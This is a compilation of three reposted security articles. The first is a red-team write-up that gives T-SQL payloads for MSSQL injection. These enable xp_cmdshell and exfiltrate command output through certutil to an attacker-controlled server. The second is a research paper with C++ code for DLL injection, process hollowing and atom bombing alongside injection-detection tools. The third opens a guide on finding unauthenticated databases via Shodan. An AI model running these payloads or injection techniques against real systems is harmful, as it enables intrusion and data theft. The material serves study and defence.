( Original text by Pablo Martinez )


In a Red Team operation, a perimeter asset vulnerable to SQL Injection was identified. Through this vulnerability it was possible to execute commands on the server, requiring an unusual tactic to achieve the exfiltration of the output of the commands. In this article we will explain the approach that was followed to successfully compromise this first perimeter element that was later used to pivot the internal network.

0x01 – Stacked queries

The starting environment is an ASP application that uses a Microsoft SQL Server as its database engine.

The vulnerability is quickly located because, when inserting a simple quotation mark, an ODBC Driver error is displayed on the page indicating that the closing quotation mark is missing. After several failed attempts to form a valid query or SQL expression (e.g. concatenation with the”+” operator), the option of the injection point being a parameter in a stored procedure call is considered. To confirm this, new parameters are introduced by injecting a comma, which effectively causes an error due to an excess of arguments.

Error caused by the passage of too many arguments

As the documentation specifies, the parameters passed to a stored procedure must be constants or variables, so typical union-based or blind techniques cannot be applied. The alternative: the use of stacked queries, supported by default in ASP environments with SQL Server.

Stacked queries consist of the execution of two or more SQL queries in the same transaction, separated by the semicolon character. In this way, it is possible to dump information from the database using time-based techniques:

In this case, the web application does not handle critical information or users with greater privileges, so the Red Team proceeds to investigate new ways, such as the execution of commands.

In MSSQL, there is a procedure called xp_cmdshell that receives a command from Windows, executes it and returns the result as rows of text. The problem in a scenario like this is that the output will never be returned to the user, since the injection no longer occurs in the original query. Therefore, to check that the commands are executed correctly, a by-default Windows utility is used: certutil.exe.

This command, whose original utility is the management of certificates, can be very useful in a Red Team exercise for many reasons:

  • It is by-default Windows binary signed by Microsoft.
  • Allows to make HTTP/s connections and is proxy-aware (uses the proxy configured in the system).
  • Allows to perform Base64 or hex encoding/decoding.

In our scenario, it will be used to make a HTTPs request to a web server controlled by us, so we can confirm that the command was actually executed.

Our server receives a request with User-Agent “CertUtil URL Agent

Although the most common case is that the user of the application does not have permissions to execute the xp_cmdshell procedure (by default disabled), it has been seen on several occasions that, due to a bad configuration, it does have permissions to enable it. In that case, the following queries could be used:

  • EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE;
  • EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;

From here, we’ll see how to exfiltrate the output of any command executed.

0x02 – Data exfiltration

At this point we can execute system commands and make HTTP/s requests to a web server controlled by us. Mixing these two ingredients, it is trivial to exfiltrate information by sending a GET request to https://redteam/[codified_information]. In this case, Base64 is chosen over hexadecimal, because it allows to save more information in fewer characters.

The procedure to achieve it is as follows:

  1. Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows).
  2. Dump the output of the command to the previous variable.
  3. Concatenate the rows of the table, separated by a line break.
  4. Encode the resulting string in Base64 and save it in a variable.
  5. Generate the certutil command, appending the string with the result.
  6. Execute it.

There is no direct way to perform steps 3 and 4 in T-SQL, but they can be sorted out with two little tricks:

  • There is no function like group_concat (MySQL), so the FOR XML clause is used to concatenate all the rows. In this way, it is possible to obtain the data in the form of a single string (XML), from which we remove the information of the labels by indicating an empty string in PATH mode:
  • SELECT column+char(10) as ‘text()’ FROM table FOR XML path(») — A line break is appended at the end of each row — char(10)
  • On the other hand, there is also no direct way to convert a string to Base64, but there is an option to represent the binary data in Base64. The solution, then, is to convert the string previously into a binary data type:
  • SELECT cast(‘tarlogic’ AS varbinary(max)) FOR XML path(»), BINARY BASE64

To perform this encoding there are other alternatives, such as the use of XQuery.

Putting all the steps together in T-SQL, they would look like the following:

  1. declare @r varchar(4120),@cmdOutput varchar(4120);
  2. declare @res TABLE(line varchar(max));
  3. insert into @res exec xp_cmdshell ‘COMMAND’;
  4. set @cmdOutput=(select (select cast((select line+char(10) COLLATE SQL_Latin1_General_CP1253_CI_AI as ‘text()’ from @res for xml path(»)) as varbinary(max))) for xml path(»),binary base64);
  5. set @r=concat(‘certutil -urlcache -f https://redteam/’,@cmdOutput);
  6. exec xp_cmdshell @r;

When reading the table containing the result of the command, the collation has been taken into account, since the compromised server returned information such as letters with accent mark that spoiled the Base64 encoding.

Request log containing the output of the commands in Base64

Also, when decoding Base64, it must be taken into account that, since it’s a Windows environment, the output of the command will be represented in Unicode.

0x03 – Automatization

Once we have the ability to execute and view the output of any command, we proceed to automate the process. To do this, the Red Team developed a tool that offers the user a prompt to enter a command. Then, it generates the payload needed to run it while a web server is deployed in order to receive the result. Finally, it decodes it and displays it on the screen.

Tool for automatization

The tool source code, as proof of concept, is available at the following link:


We have seen how a perimeter asset that a priori did not handle critical or useful information to carry out an intrusion, has allowed the Red Team to turn it into a stepping stone to pivot to the internal network of the target. For this reason, it is important to consider the need for a hardening process and the creation of alerts for this kind of exfiltration, and not just periodic vulnerability audits.


Userland API Monitoring and Code Injection Detection

( Original text by dtm )

bout This Paper

The following document is a result of self-research of malicious software (malware) and its interaction with the Windows Application Programming Interface (WinAPI). It details the fundamental concepts behind how malware is able to implant malicious payloads into other processes and how it is possible to detect such functionality by monitoring communication with the Windows operating system. The notion of observing calls to the API will also be illustrated by the procedure of hooking certain functions which will be used to achieve the code injection techniques.

Disclaimer: Since this was a relatively accelerated project due to some time constraints, I would like to kindly apologise in advance for any potential misinformation that may be presented and would like to ask that I be notified as soon as possible so that it may revised. On top of this, the accompanying code may be under-developed for practical purposes and have unforseen design flaws.


In the present day, malware are developed by cyber-criminals with the intent of compromising machines that may be leveraged to perform activities from which they can profit. For many of these activities, the malware must be able survive out in the wild, in the sense that they must operate covertly with all attempts to avert any attention from the victims of the infected and thwart detection by anti-virus software. Thus, the inception of stealth via code injection was the solution to this problem.

Section I: Fundamental Concepts

Inline Hooking

Inline hooking is the act of detouring the flow of code via hotpatching. Hotpatching is defined as the modification of code during the runtime of an executable image[1]. The purpose of inline hooking is to be able to capture the instance of when the program calls a function and then from there, observation and/or manipulation of the call can be accomplished. Here is a visual representation of how normal execution works:

Normal Execution of a Function Call

| Program | ------ calls function -----> | Function | (execution of function)

versus execution of a hooked function:

This can be separated into three steps. To demonstrate this process, the WinAPI function MessageBox 15 will be used.

  1. Hooking the function

To hook the function, we first require the intermediate function which must replicate parameters of the targetted function. Microsoft Developer Network (MSDN) defines MessageBox as the following:

int WINAPI MessageBox(
    _In_opt_ HWND    hWnd,
    _In_opt_ LPCTSTR lpText,
    _In_opt_ LPCTSTR lpCaption,
    _In_     UINT    uType

So the intermediate function may be defined like so:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    // our code in here

Once this exists, execution flow has somewhere for the code to be redirected. To actually hook the MessageBoxfunction, the first few bytes of the code can be patched (keep in mind that the original bytes must be saved so that the function may be restored for when the intermediate function is finished). Here are the original assembly instructions of the function as represented in its corresponding module user32.dll:

; MessageBox
8B FF   mov edi, edi
55      push ebp
8B EC   mov ebp, esp

versus the hooked function:

; MessageBox
68 xx xx xx xx  push <HookedMessageBox> ; our intermediate function
C3              ret

Here I have opted to use the push-ret combination instead of an absolute jmp due to my past experiences of it not being reliable for reasons to be discovered. xx xx xx xx represents the little-endian byte-order address of HookedMessageBox.

  1. Capturing the function call

When the program calls MessageBox, it will execute the push-ret and effectively jump into the HookedMessageBox function and once there, it has complete control over the paramaters and the call itself. To replace the text that will be shown on the message box dialog, the following can be defined in HookedMessageBox:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    TCHAR szMyText[] = TEXT("This function has been hooked!");

szMyText can be used to replace the LPCTSTR lpText parameter of MessageBox.

  1. Resuming normal execution

To forward this parameter, execution needs to continue to the original MessageBox so that the operating system can display the dialog. Since calling MessageBox again will just result in an infinite recursion, the original bytes must be restored (as previously mentioned).

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    TCHAR szMyText[] = TEXT("This function has been hooked!");
    // restore the original bytes of MessageBox
    // ...
    // continue to MessageBox with the replaced parameter and return the return value to the program
    return MessageBox(hWnd, szMyText, lpCaption, uType);

If rejecting the call to MessageBox was desired, it is as easy as returning a value, preferrably one that is defined in the documentation. For example, to return the “No” option from a “Yes/No” dialog, the intermediate function can be:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    return IDNO;  // IDNO defined as 7

API Monitoring

The concept of API monitoring follows on from function hooking. Because gaining control of function calls is possible, observation of all of the parameters is also possible, as previously mentioned hence the name API monitoring. However, there is a small issue which is caused by the availability of different high-level API calls that are unique but operate using the same set of API at a lower level. This is called function wrapping, defined as subroutines whose purpose is to call a secondary subroutine. Returning to the MessageBox example, there are two defined functions: MessageBoxA for parameters that contain ASCII characters and a MessageBoxW for parameters that contain wide characters. In reality, to hook MessageBox, it is required that both MessageBoxAand MessageBoxW be patched. The solution to this problem is to hook at the lowest possible common point of the function call hierarchy.

                                                      | Program |
                                                     /           \
                                                    |             |
                                            +------------+   +------------+
                                            | Function A |   | Function B |
                                            +------------+   +------------+
                                                    |             |
                                           | user32.dll, kernel32.dll, ... |
       +---------+       +-------- hook -----------------> |
       |   API   | <---- +              +-------------------------------------+
       | Monitor | <-----+              |              ntdll.dll              |
       +---------+       |              +-------------------------------------+
                         +-------- hook -----------------> |                           User mode
                                                                                       Kernel mode

Here is what the MessageBox call hierarchy looks like:

Here is MessageBoxA:

user32!MessageBoxA -> user32!MessageBoxExA -> user32!MessageBoxTimeoutA -> user32!MessageBoxTimeoutW

and MessageBoxW:

user32!MessageBoxW -> user32!MessageBoxExW -> user32!MessageBoxTimeoutW

The call hierarchy both funnel into MessageBoxTimeoutW which is an appropriate location to hook. For functions that have a deeper hierarchy, hooking any lower could prove to be unecessarily troublesome due to the possibility of an increasing complexity of the function’s parameters. MessageBoxTimeoutW is an undocumented WinAPI function and is defined[2] like so:

int WINAPI MessageBoxTimeoutW(
    HWND hWnd, 
    LPCWSTR lpText, 
    LPCWSTR lpCaption, 
    UINT uType, 
    WORD wLanguageId, 
    DWORD dwMilliseconds

To log the usage:

int WINAPI MessageBoxTimeoutW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType, WORD wLanguageId, DWORD dwMilliseconds) {
    std::wofstream logfile;     // declare wide stream because of wide parameters"log.txt", std::ios::out | std::ios::app);
    logfile << L"Caption: " << lpCaption << L"\n";
    logfile << L"Text: " << lpText << L"\n";
    logfile << L"Type: " << uType << :"\n";
    // restore the original bytes
    // ...
    // pass execution to the normal function and save the return value
    int ret = MessageBoxTimeoutW(hWnd, lpText, lpCaption, uType, wLanguageId, dwMilliseconds);
    // rehook the function for next calls
    // ...
    return ret;   // return the value of the original function

Once the hook has been placed into MessageBoxTimeoutWMessageBoxA and MessageBoxW should both be captured.

Code Injection Primer

For the purposes of this paper, code injection will be defined as the insertion of executable code into an external process. The possibility of injecting code is a natural result of the functionality allowed by the WinAPI. If certain functions are stringed together, it is possible to access an existing process, write data to it and then execute it remotely under its context. In this section, the relevant techniques of code injection that was covered in the research will be introduced.

DLL Injection

Code can come from a variety of forms, one of which is a Dynamic Link Library (DLL). DLLs are libraries that are designed to offer extended functionality to an executable program which is made available by exporting subroutines. Here is an example DLL that will be used for the remainder of the paper:

extern "C" void __declspec(dllexport) Demo() {
    ::MessageBox(nullptr, TEXT("This is a demo!"), TEXT("Demo"), MB_OK);

bool APIENTRY DllMain(HINSTANCE hInstDll, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH)
        ::CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)Demo, nullptr, 0, nullptr);
    return true;

When a DLL is loaded into a process and initialised, the loader will call DllMain with fdwReason set to DLL_PROCESS_ATTACH. For this example, when it is loaded into a process, it will thread the Demo subroutine to display a message box with the title Demo and the text This is a demo!. To correctly finish the initialisation of a DLL, it must return true or it will be unloaded.


DLL injection via the CreateRemoteThread 7 function utilises this function to execute a remote thread in the virtual space of another process. As mentioned above, all that is required to execute a DLL is to have it load into the process by forcing it to execute the LoadLibrary function. The following code can be used to accomplish this:

void injectDll(const HANDLE hProcess, const std::string dllPath) {
    LPVOID lpBaseAddress = ::VirtualAllocEx(hProcess, nullptr, dllPath.length(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ::WriteProcessMemory(hProcess, lpBaseAddress, dllPath.c_str(), dllPath.length(), &dwWritten);
    HMODULE hModule = ::GetModuleHandle(TEXT("kernel32.dll"));
    LPVOID lpStartAddress = ::GetProcAddress(hModule, "LoadLibraryA");      // LoadLibraryA for ASCII string
    ::CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);

MSDN defines LoadLibrary as:

    _In_ LPCTSTR lpFileName

It takes a single parameter which is the path name to the desired library to load. The CreateRemoteThreadfunction allows one parameter to be passed into the thread routine which matches exactly that of LoadLibrary‘s function definition. The goal is to allocate the string parameter in the virtual address space of the target process and then pass that allocated space’s address into the parameter argument of CreateRemoteThread so that LoadLibrary can be invoked to load the DLL.

  1. Allocating virtual memory in the target process

Using VirtualAllocEx allows space to be allocated within a selected process and on success, it will return the starting address of the allocated memory.

Virtual Address Space of Target Process
                                              |                    |
                        VirtualAllocEx        +--------------------+
                        Allocated memory ---> |     Empty space    |
                                              |                    |
                                              |     Executable     |
                                              |       Image        |
                                              |                    |
                                              |                    |
                                              |    kernel32.dll    |
                                              |                    |
  1. Writing the DLL path to allocated memory

Once memory has been initialised, the path to the DLL can be injected into the allocated memory returned by VirtualAllocEx using WriteProcessMemory.

Virtual Address Space of Target Process
                                              |                    |
                        WriteProcessMemory    +--------------------+
                        Inject DLL path ----> | "..\..\myDll.dll"  |
                                              |                    |
                                              |     Executable     |
                                              |       Image        |
                                              |                    |
                                              |                    |
                                              |    kernel32.dll    |
                                              |                    |
  1. Get address of LoadLibrary

Since all system DLLs are mapped to the same address space across all processes, the address of LoadLibrary does not have to be directly retrieved from the target process. Simply calling GetModuleHandle(TEXT("kernel32.dll")) and GetProcAddress(hModule, "LoadLibraryA") will do the job.

  1. Loading the DLL

The address of LoadLibrary and the path to the DLL are the two main elements required to load the DLL. Using the CreateRemoteThread function, LoadLibrary is executed under the context of the target process with the DLL path as a parameter.

Virtual Address Space of Target Process
                                              |                    |
                                   +--------- | "..\..\myDll.dll"  |
                                   |          +--------------------+
                                   |          |                    |
                                   |          +--------------------+ <---+
                                   |          |     myDll.dll      |     |
                                   |          +--------------------+     |
                                   |          |                    |     | LoadLibrary
                                   |          +--------------------+     | loads
                                   |          |     Executable     |     | and
                                   |          |       Image        |     | initialises
                                   |          +--------------------+     | myDll.dll
                                   |          |                    |     |
                                   |          |                    |     |
          CreateRemoteThread       v          +--------------------+     |
          LoadLibraryA("..\..\myDll.dll") --> |    kernel32.dll    | ----+
                                              |                    |


Windows offers developers the ability to monitor certain events with the installation of hooks by using the SetWindowsHookEx 6 function. While this function is very common in the monitoring of keystrokes for keylogger functionality, it can also be used to inject DLLs. The following code demonstrates DLL injection into itself:

int main() {
    HMODULE hMod = ::LoadLibrary(DLL_PATH);
    HOOKPROC lpfn = (HOOKPROC)::GetProcAddress(hMod, "Demo");
    HHOOK hHook = ::SetWindowsHookEx(WH_GETMESSAGE, lpfn, hMod, ::GetCurrentThreadId());
    ::PostThreadMessageW(::GetCurrentThreadId(), WM_RBUTTONDOWN, (WPARAM)0, (LPARAM)0);

    // message queue to capture events
    MSG msg;
    while (::GetMessage(&msg, nullptr, 0, 0) > 0) {
    return 0;

SetWindowsHookEx defined by MSDN as:

HHOOK WINAPI SetWindowsHookEx(
    _In_ int       idHook,
    _In_ HOOKPROC  lpfn,
    _In_ HINSTANCE hMod,
    _In_ DWORD     dwThreadId

takes a HOOKPROC parameter which is a user-defined callback subroutine that is executed when the specific hook event is trigged. In this case, the event is WH_GETMESSAGE which deals with messages in the message queue. The code initially loads the DLL into its own virtual process space and the exported Demo function’s address is obtained and defined as the callback function in the call to SetWindowsHookEx. To force the callback function to execute, PostThreadMessage is called with the message WM_RBUTTONDOWN which will trigger the WH_GETMESSAGE hook and thus the message box will be displayed.


DLL injection with QueueUserAPC 5 works similar to that of CreateRemoteThread. Both allocate and inject the DLL path into the virtual address space of a target process and then force a call to LoadLibrary under its context.

int injectDll(const std::string dllPath, const DWORD dwProcessId, const DWORD dwThreadId) {
    HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, false, dwProcessId);

    HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, false, dwThreadId);
    LPVOID lpLoadLibraryParam = ::VirtualAllocEx(hProcess, nullptr, dllPath.length(), MEM_COMMIT, PAGE_READWRITE);
    ::WriteProcessMemory(hProcess, lpLoadLibraryParam,, dllPath.length(), &dwWritten);
    ::QueueUserAPC((PAPCFUNC)::GetProcAddress(::GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA"), hThread, (ULONG_PTR)lpLoadLibraryParam);
    return 0;

One major difference between this and CreateRemoteThread is that QueueUserAPC operates on alertable states. Asynchronous procedures queued by QueueUserAPC are only handled when a thread enters this state.

Process Hollowing

Process hollowing, AKA RunPE, is a popular method used to evade anti-virus detection. It allows the injection of entire executable files to be loaded into a target process and executed under its context. Often seen in crypted applications, a file on disk that is compatible with the payload is selected as the host and is created as a process, has its main executable module hollowed out and replaced. This procedure can be broken up into four stages.

  1. Creating a host process

In order for the payload to be injected, the bootstrap must first locate a suitable host. If the payload is a .NET application, the host must also be a .NET application. If the payload is a native executable defined to use the console subsystem, the host must also reflect the same attributes. The same is applied to x86 and x64 programs. Once the host has been chosen, it is created as a suspended process using CreateProcess(PATH_TO_HOST_EXE, ..., CREATE_SUSPENDED, ...).

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |         PE         |
                                        |     |       Headers      |
                                        |     +--------------------+
                                        |     |       .text        |
                                        |     +--------------------+
                          CreateProcess +     |       .data        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        +---  +--------------------+
  1. Hollowing the host process

For the payload to work correctly after injection, it must be mapped to a virtual address space that matches its ImageBase value found in the optional header of the payload’s PE headers.

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;          // <---- this is required later
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;                    // <---- 
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;                  // <---- size of the PE file as an image
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;

This is important because it is more than likely that absolute addresses are involved within the code which is entirely dependent on its location in memory. To safely map the executable image, the virtual memory space starting at the described ImageBase value must be unmapped. Since many executables share common base addresses (usually 0x400000), it is not uncommon to see the host process’s own executable image unmapped as a result. This is done with NtUnmapViewOfSection(IMAGE_BASE, SIZE_OF_IMAGE).

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                   NtUnmapViewOfSection +     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        +---  +--------------------+
  1. Injecting the payload

To inject the payload, the PE file must be parsed manually to transform it from its disk form to its image form. After allocating virtual memory with VirtualAllocEx, the PE headers are directly copied to that base address.

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |         PE         |
                                        |     |       Headers      |
                                        +---  +--------------------+
                                        |     |                    |
                                        |     |                    |
                     WriteProcessMemory +     |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |

To convert the PE file to an image, all of the sections must be individually read from their file offsets and then placed correctly into their correct virtual offsets using WriteProcessMemory. This is described in each of the sections’ own section header 1.

typedef struct _IMAGE_SECTION_HEADER {
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;               // <---- virtual offset
  DWORD SizeOfRawData;
  DWORD PointerToRawData;             // <---- file offset
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
Executable Image of Host Process
                                              |         PE         |
                                              |       Headers      |
                                        +---  +--------------------+
                                        |     |       .text        |
                                        +---  +--------------------+
                     WriteProcessMemory +     |       .data        |
                                        +---  +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
  1. Execution of payload

The final step is to point the starting address of execution to the payload’s aforementioned AddressOfEntryPoint. Since the process’s main thread is suspended, using GetThreadContext to retrieve the relevant information. The context structure is defined as:

typedef struct _CONTEXT
     ULONG ContextFlags;
     ULONG Dr0;
     ULONG Dr1;
     ULONG Dr2;
     ULONG Dr3;
     ULONG Dr6;
     ULONG Dr7;
     ULONG SegGs;
     ULONG SegFs;
     ULONG SegEs;
     ULONG SegDs;
     ULONG Edi;
     ULONG Esi;
     ULONG Ebx;
     ULONG Edx;
     ULONG Ecx;
     ULONG Eax;                        // <----
     ULONG Ebp;
     ULONG Eip;
     ULONG SegCs;
     ULONG EFlags;
     ULONG Esp;
     ULONG SegSs;
     UCHAR ExtendedRegisters[512];

To modify the starting address, the Eax member must be changed to the virtual address of the payload’s AddressOfEntryPoint. Simply, context.Eax = ImageBase + AddressOfEntryPoint. To apply the changes to the process’s thread, calling SetThreadContext and passing in the modified CONTEXT struct is sufficient. All that is required now is to call ResumeThread and payload should start execution.

Atom Bombing

The Atom Bombing is a code injection technique that takes advantage of global data storage via Windows’s global atom table. The global atom table’s data is accessible across all processes which is what makes it a viable approach. The data stored in the table is a null-terminated C-string type and is represented with a 16-bit integer key called the atom, similar to that of a map data structure. To add data, MSDN provides a GlobalAddAtom 4 function and is defined as:

ATOM WINAPI GlobalAddAtom(
    _In_ LPCTSTR lpString

where lpString is the data to be stored. The 16-bit integer atom is returned on a successful call. To retrieve the data stored in the global atom table, MSDN provides a GlobalGetAtomName 2 defined as:

UINT WINAPI GlobalGetAtomName(
    _In_  ATOM   nAtom,
    _Out_ LPTSTR lpBuffer,
    _In_  int    nSize

Passing in the identifying atom returned from GlobalAddAtom will place the data into lpBuffer and return the length of the string excluding the null-terminator.

Atom bombing works by forcing the target process to load and execute code placed within the global atom table and this relies on one other crucial function, NtQueueApcThread, which is lowest level userland call for QueueUserAPC. The reason why NtQueueApcThread is used over QueueUserAPC is because, as seen before, QueueUserAPC‘s APCProc 1 only receives one parameter which is a parameter mismatch compared to GlobalGetAtomName[3].

VOID CALLBACK APCProc(               UINT WINAPI GlobalGetAtomName(
                                         _In_  ATOM   nAtom,
    _In_ ULONG_PTR dwParam     ->        _Out_ LPTSTR lpBuffer,
                                         _In_  int    nSize
);                                   );

However, the underlying implementation of NtQueueApcThread allows for three potential parameters:

NTSTATUS NTAPI NtQueueApcThread(                      UINT WINAPI GlobalGetAtomName(
    _In_     HANDLE           ThreadHandle,               // target process's thread
    _In_     PIO_APC_ROUTINE  ApcRoutine,                 // APCProc (GlobalGetAtomName)
    _In_opt_ PVOID            ApcRoutineContext,  ->      _In_  ATOM   nAtom,
    _In_opt_ PIO_STATUS_BLOCK ApcStatusBlock,             _Out_ LPTSTR lpBuffer,
    _In_opt_ ULONG            ApcReserved                 _In_  int    nSize
);                                                    );

Here is a visual representation of the code injection procedure:

Atom bombing code injection
                                              |                    |
                                              |      lpBuffer      | <-+
                                              |                    |   |
                                              +--------------------+   |
     +---------+                              |                    |   | Calls
     |  Atom   |                              +--------------------+   | GlobalGetAtomName
     | Bombing |                              |     Executable     |   | specifying
     | Process |                              |       Image        |   | arbitrary
     +---------+                              +--------------------+   | address space
          |                                   |                    |   | and loads shellcode
          |                                   |                    |   |
          |           NtQueueApcThread        +--------------------+   |
          +---------- GlobalGetAtomName ----> |      ntdll.dll     | --+
                                              |                    |

This is a very simplified overview of atom bombing but should be adequate for the remainder of the paper. For more information on atom bombing, please refer to enSilo’s AtomBombing: Brand New Code Injection for Windows 27.

Section II: UnRunPE

UnRunPE is a proof-of-concept (PoC) tool that was created for the purposes of applying API monitoring theory to practice. It aims to create a chosen executable file as a suspended process into which a DLL will be injected to hook specific functions utilised by the process hollowing technique.

Code Injection Detection

From the code injection primer, the process hollowing method was described with the following WinAPI call chain:

  1. CreateProcess
  2. NtUnmapViewOfSection
  3. VirtualAllocEx
  4. WriteProcessMemory
  5. GetThreadContext
  6. SetThreadContext
  7. ResumeThread

A few of these calls do not have to be in this specific order, for example, GetThreadContext can be called before VirtualAllocEx. However, the general arrangement cannot deviate much because of the reliance on former API calls, for example, SetThreadContext must be called before GetThreadContext or CreateProcess must be called first otherwise there will be no target process to inject the payload. The tool assumes this as a basis on which it will operate in an attempt to detect a potentially active process hollowing.

Following the theory of API monitoring, it is best to hook the lowest, common point but when it comes it malware, it should ideally be the lowest possible that is accessible. Assuming a worst case scenario, the author may attempt to skip the higher-level WinAPI functions and directly call the lowest function in the call hierarchy, usually found in the ntdll.dll module. The following WinAPI functions are the lowest in the call hierarchy for process hollowing:

  1. NtCreateUserProcess
  2. NtUnmapViewOfSection
  3. NtAllocateVirtualMemory
  4. NtWriteVirtualMemory
  5. NtGetContextThread
  6. NtSetContextThread
  7. NtResumeThread

Code Injection Dumping

Once the necessary functions are hooked, the target process is executed and each of the hooked functions’ parameters are logged to keep track of the current progress of the process hollowing and the host process. The most significant hooks are NtWriteVirtualMemory and NtResumeThread because the former applies the injection of the code and the latter executes it. Along with logging the parameters, UnRunPE will also attempt to dump the bytes written using NtWriteVirtualMemory and then when NtResumeThread is reached, it will attempt to dump the entire payload that has been injected into the host process. To achieve this, it uses the process and thread handle parameters logged in NtCreateUserProcess and the base address and size logged from NtUnmapViewOfSection. Using the parameters provided by NtAllocateVirtualMemory may be more appropriate however, due to some unknown reasons, hooking that function results in some runtime errors. When the payload has been dumped from NtResumeThread, it will terminate the target process and its host process to prevent execution of the injected code.

UnRunPE Demonstration

For the demonstration, I have chosen to use a trojanised binary that I had previously created as an experiment. It consists of the main executable PEview.exe and PuTTY.exe as the hidden executable.


Section III: Dreadnought

Dreadnought is a PoC tool that was built upon UnRunPE to support a wider variety of code injection detection, namely, those listed in Code Injection Primer. To engineer such an application, a few augmentations are required.

Detecting Code Injection Method

Because there are so many methods of code injection, differentiating each technique was a necessity. The first approach to this was to recognise a “trigger” API call, that is, the API call which would peform the remote execution of the payload. Using this would do two things: identify the completion of and, to an extent, the type of the code injection. The type can be categorised into four groups:

  • Section: Code injected as/into a section
  • Process: Code injected into a process
  • Code: Generic code injection or shellcode
  • DLL: Code injected as DLLs

Process Injection Info Graphic[4] by Karsten Hahn 2

Each trigger API is listed underneath Execute. When either of these APIs have been reached, Dreadought will perform a code dumping method that matches the assumed injection type in a similar fashion to what occurs with process hollowing in UnRunPE. Reliance on this is not enough because there is still potential for API calls to be mixed around to achieve the same functionality as displayed from the stemming of arrows.


For Dreadnought to be able to determine code injection methods more accurately, a heuristic should be involved as an assist. In the development, a very simplistic heuristic was applied. Following the process injection infographic, every time an API was hooked, it would increase the weight of one or more of the associated code injection types stored within a map data structure. As it traces each API call, it will start to favour a certain type. Once the trigger API has been entered, it will identify and compare the weights of the relevant types and proceed with an appropriate action.

Dreadnought Demonstration

Process Injection — Process Hollowing


DLL Injection — SetWindowsHookEx


DLL Injection — QueueUserAPC


Code Injection — Atom Bombing





This paper aimed to bring a technical understanding of code injection and its interaction with the WinAPI. Furthermore, the concept of API monitoring in userland was entertained with the malicious use of injection methods utilised by malware to bypass anti-virus detection. The following presents the current status of Dreadnought as of this writing.


Dreadnought’s current heuristic and detection design is incredibly poor but was sufficient enough for theoretical demonstration purposes. Practical use may not be ideal since there is a high possibility that there will be collateral with respect to the hooked API calls during regular operations with the operating system. Because of the impossibility to discern benign from malicious behaviour, false positives and negatives may arise as a result.

With regards to Dreadnought and its operations within userland, it may not be ideal use when dealing with sophisticated malware, especially those which have access to direct interactions with the kernel and those which have the capabilities to evade hooks in general.

PoC Repositories


How to find open databases with the help of Shodan and Lampyre

( Original text by )

Today I’ll be telling you about the tool which combines the advantages of many tools for Cyber Threat Intelligence and Open Source Intelligence Gathering (OSINT) and which allows you to analyze the obtained data in a comfy way. You’ll learn how to easily find databases without any authentication using the Shodan capabilities with the Lampyre tools. Of course, Shodan can also be used for mining other interesting data. For example, you can visualize the location of web cameras on a map, get info on the devices with enabled RDP and take a look at their screenshots and a lot more, but all this — a topic for some other time.

The problems with unsafe default configurations of some databases are no news and are widely discussed on the Web. However, regardless of that, many still don’t pay enough attention.

Latest news on the data leaks of the American Express India and Voxox’s database (running on Amazon’s Elasticsearch) only confirms this. Nobody is protected against human mistakes and sometimes the price of these mistakes is just too high!

MongoDB, Elasticsearch, Cassandra and some other databases do not have authorization enabled by default. This means that anyone in the Internet may not only look into their content and download it but also change the existing data or use it in some fraudulent activities — for example, phishing or encrypting all data and then demanding for bitcoins or any other. The same may happen to some other services, such as FTP for example.

